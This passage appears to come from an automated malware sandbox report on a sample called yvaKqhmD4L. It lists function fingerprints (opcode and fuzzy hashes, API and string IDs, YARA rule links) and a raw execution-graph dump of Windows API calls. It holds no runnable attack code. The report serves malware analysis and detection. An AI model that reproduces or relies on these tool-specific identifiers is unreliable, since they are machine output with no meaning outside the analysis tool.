                                              • API String ID: 3519838083-117937767
                                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                              • Instruction ID: 7a0d81814b69ec64c0f6aa94e094b2ba0cff0a283db244d7a5b1e07e37f1761e
                                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                              • Instruction Fuzzy Hash: 2641B235201789DFDB119F61D8907EABBE2FF45709F00482EE85A97B10CB75A948CBA1
                                              Function 6C26ACB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __aulldiv
                                              • String ID: 3333
                                              • API String ID: 3732870572-2924271548
                                              • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                              • Instruction ID: 265a9cb7dfa89611be864596d014f9692dc29791475d950551710ef62b7d7c6e
                                              • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                              • Instruction Fuzzy Hash: 7921BAB4A00718AFD724CFAA8880B5BFAFCEB44755F108A1EA586D3B40D77099448765
                                              Function 6C263906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: @$LuJ
                                              • API String ID: 3519838083-205571748
                                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                              • Instruction ID: 7f16ea1f92247adeaa10d335a02b6ed38fe58b18b7b7ee9722caaa075ecd56bb
                                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                              • Instruction Fuzzy Hash: 56016172E0224ADBDB10DF9A84809AEF7B4FF56704F50842EE96AE3A41C3349944CF65
                                              Function 6C23F0AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: @$xMJ
                                              • API String ID: 3519838083-951924499
                                              • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                              • Instruction ID: d092169f99b5e022189a1670d658ddb6c8c4ab531e28ae0b2d9f88d22aa76ee8
                                              • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                              • Instruction Fuzzy Hash: 991130B1A0131ADBCB00DFA9E49059EB7B4FF58308B50D46EE869E7640D3349A05CB55
                                              Function 6C211418 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 6C211439
                                              • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C20DD2A,?,00000004,?,4B42FCB6,?,?,6C202E7C,4B42FCB6,?), ref: 6C211475
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: AllocHeap_free
                                              • String ID: 8Q
                                              • API String ID: 1080816511-4022487301
                                              • Opcode ID: ea3d6075cece48542f8999695606b634c29cdbec26ec60f880b8b070b50230b4
                                              • Instruction ID: 2eb8de324644824d7cc1d627648556a7149b84b35558f60ab683766a53c61121
                                              • Opcode Fuzzy Hash: ea3d6075cece48542f8999695606b634c29cdbec26ec60f880b8b070b50230b4
                                              • Instruction Fuzzy Hash: 94F0283170D11EA6DB101A279C04E8B27E89FE2FBAB108116FE1156E80DBB0D4858191
                                              Function 6C262741 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C262746
                                                • Part of subcall function 6C2627BF: __EH_prolog.LIBCMT ref: 6C2627C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: ur&l$sJ
                                              • API String ID: 3519838083-1921328803
                                              • Opcode ID: 479f86800d12ad63e1b8ae242903cd26d6f9166e8cc8054c33d6365a60c3e9bf
                                              • Instruction ID: 2f1dddf62f140c72b8194892c727cf6cc389e16d13ada94bcdb4dddf9689b306
                                              • Opcode Fuzzy Hash: 479f86800d12ad63e1b8ae242903cd26d6f9166e8cc8054c33d6365a60c3e9bf
                                              • Instruction Fuzzy Hash: 7701A231A0001CABCB16BBA5C840EEDBB75AF84718F00401AEC0152A90CF789999DFD1
                                              Function 6C266431 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prologctype
                                              • String ID: |zJ
                                              • API String ID: 3037903784-3782439380
                                              • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                              • Instruction ID: d07d786cc98af525224b882929c9fdc042409edde855c0361d6f9bb9f9defca0
                                              • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                              • Instruction Fuzzy Hash: 4BE0E5326011259BE7249B4AC841B9DF3A4FF54B19F10411FE812E3E40CBF0A8408691
                                              Function 6C25D143 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prologctype
                                              • String ID: <oJ
                                              • API String ID: 3037903784-2791053824
                                              • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                              • Instruction ID: adb1feed9bfcf97e16f479b60bbe5f32248a2049b015cf782079584b7d1d790e
                                              • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                              • Instruction Fuzzy Hash: 26E0ED32A021199BEB04AF4DC810BDEF7A8EF41B18F11411EE821A3B51CBB5E820CA80
                                              Function 6C1FA19E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                              • AcquireSRWLockExclusive.KERNEL32(6C2F766C,?,?,652EF5AA,6C0C22D8,6C2F730C), ref: 6C1FA1A9
                                              • ReleaseSRWLockExclusive.KERNEL32(6C2F766C), ref: 6C1FA1E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireRelease
                                              • String ID: lv/l
                                              • API String ID: 17069307-1456510555
                                              • Opcode ID: 25dd17f0ebe80a26c2ec19faa5c4b637d15c046cfd1984427acd54df789c50d2
                                              • Instruction ID: d223e17a769ef076f158924dfb50f2d071db9f636d27a9a0347c767e6a7e8906
                                              • Opcode Fuzzy Hash: 25dd17f0ebe80a26c2ec19faa5c4b637d15c046cfd1984427acd54df789c50d2
                                              • Instruction Fuzzy Hash: C3F05E30644104CBCB109E19C848A65B7F4EB47B74F16022EED7583AC0CB381843CA51
                                              Function 6C2924AB Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @ K$DJ$T)K$X/K
                                              • API String ID: 0-3815299647
                                              • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                              • Instruction ID: 98637b94113e8fa1b433a365d19d6efbdb71fe76f87fa8d2da1efc8581c503d2
                                              • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                              • Instruction Fuzzy Hash: 1791F2B460530E8BDB04EE66C894BEE73A2AF4130DF108819DC666BB81DB79E94DC751
                                              Function 6C287E19 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D)K$H)K$P)K$T)K
                                              • API String ID: 0-2262112463
                                              • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                              • Instruction ID: fc3e5d09077910ea865fb64753ef56e43d238462a226466d91191356f83a8a3f
                                              • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                              • Instruction Fuzzy Hash: 3351AC31A0520E9BDF10DFA5D840AEEB7B1EF2471CF10452AFC5567A80DB79A94CCBA1

                                              Execution Graph

                                              Execution Coverage:4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0.3%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:38
                                              execution_graph 73232 d2acd3 73233 d2ace0 73232->73233 73237 d2acf1 73232->73237 73233->73237 73238 d2acf8 73233->73238 73239 d2c0b3 __EH_prolog 73238->73239 73240 d2c0ed 73239->73240 73246 d17193 73239->73246 73254 cf1e40 free 73239->73254 73255 cf1e40 free 73240->73255 73242 d2aceb 73245 cf1e40 free 73242->73245 73245->73237 73247 d1719d __EH_prolog 73246->73247 73256 d22db9 free ctype 73247->73256 73249 d171b3 73257 d171d5 free __EH_prolog ctype 73249->73257 73251 d171bf 73258 cf1e40 free 73251->73258 73253 d171c7 73253->73239 73254->73239 73255->73242 73256->73249 73257->73251 73258->73253 73259 d6f190 73262 cf1e0c 73259->73262 73261 d6f1b0 73263 cf1e1c malloc 73262->73263 73264 cf1e15 73262->73264 73265 cf1e3e 73263->73265 73266 cf1e2a _CxxThrowException 73263->73266 73264->73263 73265->73261 73266->73265 73267 d769d0 73268 d769d7 malloc 73267->73268 73269 d769d4 73267->73269 73271 cfb144 73272 cfb153 73271->73272 73274 cfb159 73271->73274 73275 d011b4 73272->73275 73277 d011c1 73275->73277 73276 d011eb 73276->73274 73277->73276 73280 d3ae7c 73277->73280 73285 d3af27 73277->73285 73281 d3ae86 73280->73281 73292 d07190 73281->73292 73305 d07140 73281->73305 73282 d3aebb 73282->73277 73290 d3af36 73285->73290 73286 d3aeeb 107 API calls 73286->73290 73287 d3b010 73287->73277 73290->73286 73290->73287 73406 cfbd0c 73290->73406 73411 d3ad3a 73290->73411 73415 d3aebf 107 API calls 73290->73415 73293 d0719a __EH_prolog 73292->73293 73294 d071b0 73293->73294 73295 d071dd 73293->73295 73335 d04d78 73294->73335 73309 d06fc5 73295->73309 73298 d072b4 73299 d04d78 VariantClear 73298->73299 73300 d072c0 73298->73300 73299->73300 73301 d071b7 73300->73301 73302 d07140 7 API calls 73300->73302 73301->73282 73302->73301 73303 d07236 73303->73298 73303->73301 73304 d072a3 SetFileSecurityW 73303->73304 73304->73298 73306 d0718d 73305->73306 73307 d0714b 73305->73307 73306->73282 73307->73306 73405 d04dff 7 API calls 2 library calls 73307->73405 73310 d06fcf __EH_prolog 73309->73310 73338 d044a6 73310->73338 73312 d07029 73320 d0706a 73312->73320 73360 d04dff 7 API calls 2 library calls 73312->73360 73318 d0709e 73365 cf1e40 free 73318->73365 73319 d07051 73319->73320 73322 d011b4 107 API calls 73319->73322 73341 d068ac 73320->73341 73322->73320 73323 d0712e 73323->73303 73324 d070c0 73361 cf6096 15 API calls 2 library calls 73324->73361 73326 d070d1 73327 d070e2 73326->73327 73362 d04dff 7 API calls 2 library calls 73326->73362 73331 d070e6 73327->73331 73363 d06b5e 69 API calls 2 library calls 73327->73363 73330 d070fd 73330->73331 73332 d07103 73330->73332 73331->73318 73364 cf1e40 free 73332->73364 73334 d0710b 73334->73323 73394 d19262 73335->73394 73366 cf2e04 73338->73366 73342 d068b6 __EH_prolog 73341->73342 73343 d06921 73342->73343 73356 d068c5 73342->73356 73370 cf7d4b 73342->73370 73344 d06962 73343->73344 73350 d06998 73343->73350 73376 d06a17 6 API calls 2 library calls 73343->73376 73344->73350 73377 cf2dcd malloc _CxxThrowException 73344->73377 73349 d069e1 73380 cfbcf8 CloseHandle 73349->73380 73350->73349 73369 cf7c3b SetFileTime 73350->73369 73353 d0697a 73378 d06b09 13 API calls __EH_prolog 73353->73378 73356->73318 73356->73324 73357 d0698c 73379 cf1e40 free 73357->73379 73359 d06e71 12 API calls 2 library calls 73359->73312 73360->73319 73361->73326 73362->73327 73363->73330 73364->73334 73365->73323 73367 cf1e0c ctype 2 API calls 73366->73367 73368 cf2e11 73367->73368 73368->73312 73368->73320 73368->73359 73369->73349 73381 cf77c8 73370->73381 73372 cf7d76 73372->73343 73375 d04dff 7 API calls 2 library calls 73372->73375 73375->73343 73376->73344 73377->73353 73378->73357 73379->73350 73380->73356 73385 cf7731 73381->73385 73383 cf77db 73383->73372 73384 cf7d3c SetEndOfFile 73383->73384 73384->73372 73386 cf775c SetFilePointer 73385->73386 73388 cf7740 73385->73388 73387 cf7780 GetLastError 73386->73387 73390 cf77a1 73386->73390 73389 cf778c 73387->73389 73387->73390 73388->73386 73393 cf76d6 SetFilePointer GetLastError 73389->73393 73390->73383 73392 cf7796 SetLastError 73392->73390 73393->73392 73395 d1926c __EH_prolog 73394->73395 73396 d192fc 73395->73396 73400 d192a4 73395->73400 73398 cf965d VariantClear 73396->73398 73399 d04d91 73398->73399 73399->73301 73401 cf965d 73400->73401 73402 cf9685 73401->73402 73404 cf9665 73401->73404 73402->73399 73403 cf967e VariantClear 73403->73402 73404->73402 73404->73403 73405->73306 73416 cf7ca2 73406->73416 73409 cfbd3d 73409->73290 73412 d3ad44 __EH_prolog 73411->73412 73424 d06305 73412->73424 73413 d3adbf 73413->73290 73415->73290 73418 cf7caf 73416->73418 73419 cf7cdb 73418->73419 73421 cf7c68 73418->73421 73419->73409 73420 cfb8ec GetLastError 73419->73420 73420->73409 73422 cf7c79 WriteFile 73421->73422 73423 cf7c76 73421->73423 73422->73418 73423->73422 73425 d0630f __EH_prolog 73424->73425 73461 d062b9 73425->73461 73427 d06427 73430 cf965d VariantClear 73427->73430 73429 d0644a 73431 cf965d VariantClear 73429->73431 73453 d06445 73430->73453 73432 d0646b 73431->73432 73465 d05126 73432->73465 73437 d04d78 VariantClear 73438 d06499 73437->73438 73438->73453 73457 d064ca 73438->73457 73621 d05110 9 API calls 73438->73621 73440 d065de 73441 d065e7 73440->73441 73442 d0669e 73440->73442 73445 cf1e0c ctype 2 API calls 73441->73445 73447 d065f6 73441->73447 73448 d06754 73442->73448 73449 d066b8 73442->73449 73442->73453 73443 d064da 73443->73440 73443->73453 73623 d0789c free memmove ctype 73443->73623 73445->73447 73624 d136ea 73447->73624 73511 d05bea 73448->73511 73450 cf1e0c ctype 2 API calls 73449->73450 73450->73453 73452 d0666b 73637 cf1e40 free 73452->73637 73453->73413 73454 d0665c 73636 cf31e5 malloc _CxxThrowException free _CxxThrowException 73454->73636 73457->73443 73457->73453 73622 cf42e3 CharUpperW 73457->73622 73462 d062c9 73461->73462 73638 d18fa4 73462->73638 73466 d05130 __EH_prolog 73465->73466 73467 d051b4 73466->73467 73472 d0518e 73466->73472 73700 cf3097 malloc _CxxThrowException free SysStringLen ctype 73466->73700 73470 cf965d VariantClear 73467->73470 73467->73472 73469 cf965d VariantClear 73479 d0527f 73469->73479 73471 d051bc 73470->73471 73471->73472 73473 d05206 73471->73473 73474 d05289 73471->73474 73472->73469 73701 cf3097 malloc _CxxThrowException free SysStringLen ctype 73473->73701 73474->73472 73475 d05221 73474->73475 73477 cf965d VariantClear 73475->73477 73478 d0522d 73477->73478 73478->73479 73483 d05351 73478->73483 73702 d05459 malloc _CxxThrowException __EH_prolog 73478->73702 73479->73453 73507 d18b05 73479->73507 73482 d052ba 73703 cf8011 5 API calls ctype 73482->73703 73483->73479 73487 d053a1 73483->73487 73707 cf35e7 memmove 73483->73707 73485 d052cf 73498 d052fd 73485->73498 73704 cf823d 10 API calls 2 library calls 73485->73704 73487->73479 73708 cf43b7 5 API calls 2 library calls 73487->73708 73490 d052e5 73491 cf2fec 3 API calls 73490->73491 73493 d052f5 73491->73493 73492 d0540e 73710 d0789c free memmove ctype 73492->73710 73705 cf1e40 free 73493->73705 73497 d053df 73497->73492 73499 d0541c 73497->73499 73709 cf42e3 CharUpperW 73497->73709 73706 d054a0 free ctype 73498->73706 73500 d136ea 5 API calls 73499->73500 73501 d05427 73500->73501 73502 cf2fec 3 API calls 73501->73502 73503 d05433 73502->73503 73711 cf1e40 free 73503->73711 73505 d0543b 73712 d22db9 free ctype 73505->73712 73508 d18b2e 73507->73508 73509 cf965d VariantClear 73508->73509 73510 d0648a 73509->73510 73510->73437 73510->73453 73512 d05bf4 __EH_prolog 73511->73512 73713 d054c0 73512->73713 73515 d18b05 VariantClear 73516 d05c34 73515->73516 73559 d05e17 73516->73559 73728 d05630 73516->73728 73519 d136ea 5 API calls 73520 d05c51 73519->73520 73521 d05c60 73520->73521 73831 d057c1 53 API calls 2 library calls 73520->73831 73749 cf2f1c 73521->73749 73524 d05c6c 73528 d05caa 73524->73528 73832 d06217 4 API calls 2 library calls 73524->73832 73526 d05c91 73527 cf2fec 3 API calls 73526->73527 73530 d05c9e 73527->73530 73529 d05d49 73528->73529 73534 cf2e04 2 API calls 73528->73534 73531 d05d91 73529->73531 73532 d05d55 73529->73532 73833 cf1e40 free 73530->73833 73539 d05da6 73531->73539 73752 d058be 73531->73752 73535 cf2fec 3 API calls 73532->73535 73536 d05cd2 73534->73536 73538 d05d66 73535->73538 73834 cf1e40 free 73536->73834 73541 d05d73 73538->73541 73839 cf5b2d 11 API calls 2 library calls 73538->73839 73540 cf2fec 3 API calls 73539->73540 73602 d05d8c 73539->73602 73542 d05dd1 73540->73542 73541->73539 73544 d05d7b 73541->73544 73548 d05de7 73542->73548 73561 d05e41 73542->73561 73542->73602 73549 d07140 7 API calls 73544->73549 73544->73602 73547 d05cf5 73547->73529 73556 cf2fec 3 API calls 73547->73556 73840 d06b5e 69 API calls 2 library calls 73548->73840 73549->73602 73550 d061fa 73861 cf1e40 free 73550->73861 73551 d05eb0 73555 cf1e0c ctype 2 API calls 73551->73555 73553 d05e01 73557 d05e20 73553->73557 73558 d05e07 73553->73558 73569 d05eb7 73555->73569 73560 d05d0c 73556->73560 73566 d07140 7 API calls 73557->73566 73557->73602 73841 cf1e40 free 73558->73841 73559->73453 73835 cf1089 malloc _CxxThrowException free _CxxThrowException 73560->73835 73561->73551 73843 d04115 VariantClear _CxxThrowException __EH_prolog 73561->73843 73566->73602 73567 d05d16 73570 cf2f1c 2 API calls 73567->73570 73825 cf7c0d 73569->73825 73572 d05d25 73570->73572 73573 d05e6e 73573->73551 73581 d05ea5 73573->73581 73582 d05ece 73573->73582 73573->73602 73585 cf2fec 3 API calls 73581->73585 73844 cf5c7e 11 API calls 2 library calls 73582->73844 73585->73551 73860 cf1e40 free 73602->73860 73621->73457 73622->73457 73623->73440 73625 d136f4 __EH_prolog 73624->73625 73626 cf2e04 2 API calls 73625->73626 73632 d1370a 73626->73632 73627 d13736 73628 cf2f1c 2 API calls 73627->73628 73631 d13742 73628->73631 74182 cf1e40 free 73631->74182 73632->73627 74183 cf1089 malloc _CxxThrowException free _CxxThrowException 73632->74183 74184 cf31e5 malloc _CxxThrowException free _CxxThrowException 73632->74184 73634 d06633 73634->73452 73634->73454 73635 cf1089 malloc _CxxThrowException free _CxxThrowException 73634->73635 73635->73454 73636->73452 73637->73453 73639 d18fae __EH_prolog 73638->73639 73672 d17ebb 73639->73672 73645 d19020 73661 d06302 73645->73661 73680 cf2fec 73645->73680 73649 d191b0 73695 d18b9c 10 API calls 2 library calls 73649->73695 73650 d19244 73697 cf43b7 5 API calls 2 library calls 73650->73697 73651 d19144 73659 d1917b 73651->73659 73689 cf2f88 73651->73689 73655 d19100 73658 cf965d VariantClear 73655->73658 73656 d191c0 73656->73661 73664 cf2f88 3 API calls 73656->73664 73657 d190d6 73657->73655 73663 d190e7 73657->73663 73688 d18f2e 9 API calls 73657->73688 73658->73661 73659->73649 73659->73650 73660 d1904d 73660->73651 73660->73655 73660->73657 73660->73661 73687 cf3097 malloc _CxxThrowException free SysStringLen ctype 73660->73687 73661->73427 73661->73429 73661->73453 73666 cf965d VariantClear 73663->73666 73669 d191ff 73664->73669 73666->73651 73667 d19112 73667->73655 73668 d18b64 VariantClear 73667->73668 73670 d19123 73668->73670 73669->73661 73696 cf50ff free ctype 73669->73696 73670->73655 73670->73663 73673 d17ec6 73672->73673 73674 d17ee4 73672->73674 73673->73674 73675 cf1e40 free ctype 73673->73675 73676 d18b64 73674->73676 73675->73673 73677 d18b05 VariantClear 73676->73677 73678 d18b6f 73677->73678 73678->73661 73679 d18f2e 9 API calls 73678->73679 73679->73645 73681 cf2ffc 73680->73681 73682 cf2ff8 73680->73682 73681->73682 73683 cf1e0c ctype 2 API calls 73681->73683 73682->73660 73686 d18b80 VariantClear 73682->73686 73684 cf3010 73683->73684 73698 cf1e40 free 73684->73698 73686->73660 73687->73657 73688->73667 73690 cf2f9a 73689->73690 73691 cf2fbe 73690->73691 73692 cf1e0c ctype 2 API calls 73690->73692 73691->73659 73693 cf2fb4 73692->73693 73699 cf1e40 free 73693->73699 73695->73656 73696->73661 73697->73661 73698->73682 73699->73691 73700->73467 73701->73475 73702->73482 73703->73485 73704->73490 73705->73498 73706->73483 73707->73483 73708->73497 73709->73497 73710->73499 73711->73505 73712->73479 73715 d054ca __EH_prolog 73713->73715 73714 d05507 73716 cf965d VariantClear 73714->73716 73715->73714 73717 cf965d VariantClear 73715->73717 73718 d05567 73716->73718 73720 d05528 73717->73720 73718->73515 73718->73559 73719 d05572 73721 cf965d VariantClear 73719->73721 73720->73714 73720->73719 73722 d0558e 73721->73722 73862 d04cac VariantClear __EH_prolog 73722->73862 73724 d055a1 73724->73718 73863 d04cac VariantClear __EH_prolog 73724->73863 73726 d055b8 73726->73718 73864 d04cac VariantClear __EH_prolog 73726->73864 73729 d0563a __EH_prolog 73728->73729 73731 d05679 73729->73731 73865 d13558 10 API calls 2 library calls 73729->73865 73732 cf2f1c 2 API calls 73731->73732 73748 d0571a 73731->73748 73733 d05696 73732->73733 73866 d13333 malloc _CxxThrowException free 73733->73866 73735 d056a2 73736 d056c5 73735->73736 73737 d056ad 73735->73737 73743 d056b4 73736->73743 73868 cf4adf wcscmp 73736->73868 73867 d07853 5 API calls 2 library calls 73737->73867 73740 d05707 73871 cf31e5 malloc _CxxThrowException free _CxxThrowException 73740->73871 73743->73740 73870 cf1089 malloc _CxxThrowException free _CxxThrowException 73743->73870 73744 d056d2 73744->73743 73869 d07853 5 API calls 2 library calls 73744->73869 73745 d05712 73872 cf1e40 free 73745->73872 73748->73519 73873 cf2ba6 73749->73873 73753 d058c8 __EH_prolog 73752->73753 73754 cf2e04 2 API calls 73753->73754 73755 d058e9 73754->73755 73876 cf6c72 73755->73876 73831->73521 73832->73526 73833->73528 73834->73547 73835->73567 73839->73541 73840->73553 73843->73573 73860->73550 73861->73559 73862->73724 73863->73726 73864->73718 73865->73731 73866->73735 73867->73743 73868->73744 73869->73743 73870->73740 73871->73745 73872->73748 73874 cf1e0c ctype 2 API calls 73873->73874 73875 cf2bbb 73874->73875 73875->73524 73877 cf6c7c __EH_prolog 73876->73877 73878 cf6cd3 73877->73878 73879 cf6cb7 73877->73879 73880 cf6ce2 73878->73880 73882 cf6d87 73878->73882 73881 cf2f88 3 API calls 73879->73881 74182->73634 74183->73632 74184->73632 74185 d01ade 74186 d01ae8 __EH_prolog 74185->74186 74236 cf13f5 74186->74236 74189 d01b32 6 API calls 74191 d01b8d 74189->74191 74200 d01bf8 74191->74200 74254 d01ea4 9 API calls 74191->74254 74192 d01b24 _CxxThrowException 74192->74189 74194 d01bdf 74255 cf27bb 74194->74255 74198 d01c89 74250 d01eb9 74198->74250 74200->74198 74262 d11d73 5 API calls __EH_prolog 74200->74262 74204 d01cb2 _CxxThrowException 74204->74198 74237 cf13ff __EH_prolog 74236->74237 74238 d17ebb free 74237->74238 74239 cf142b 74238->74239 74240 cf1438 74239->74240 74263 cf1212 free ctype 74239->74263 74242 cf1e0c ctype 2 API calls 74240->74242 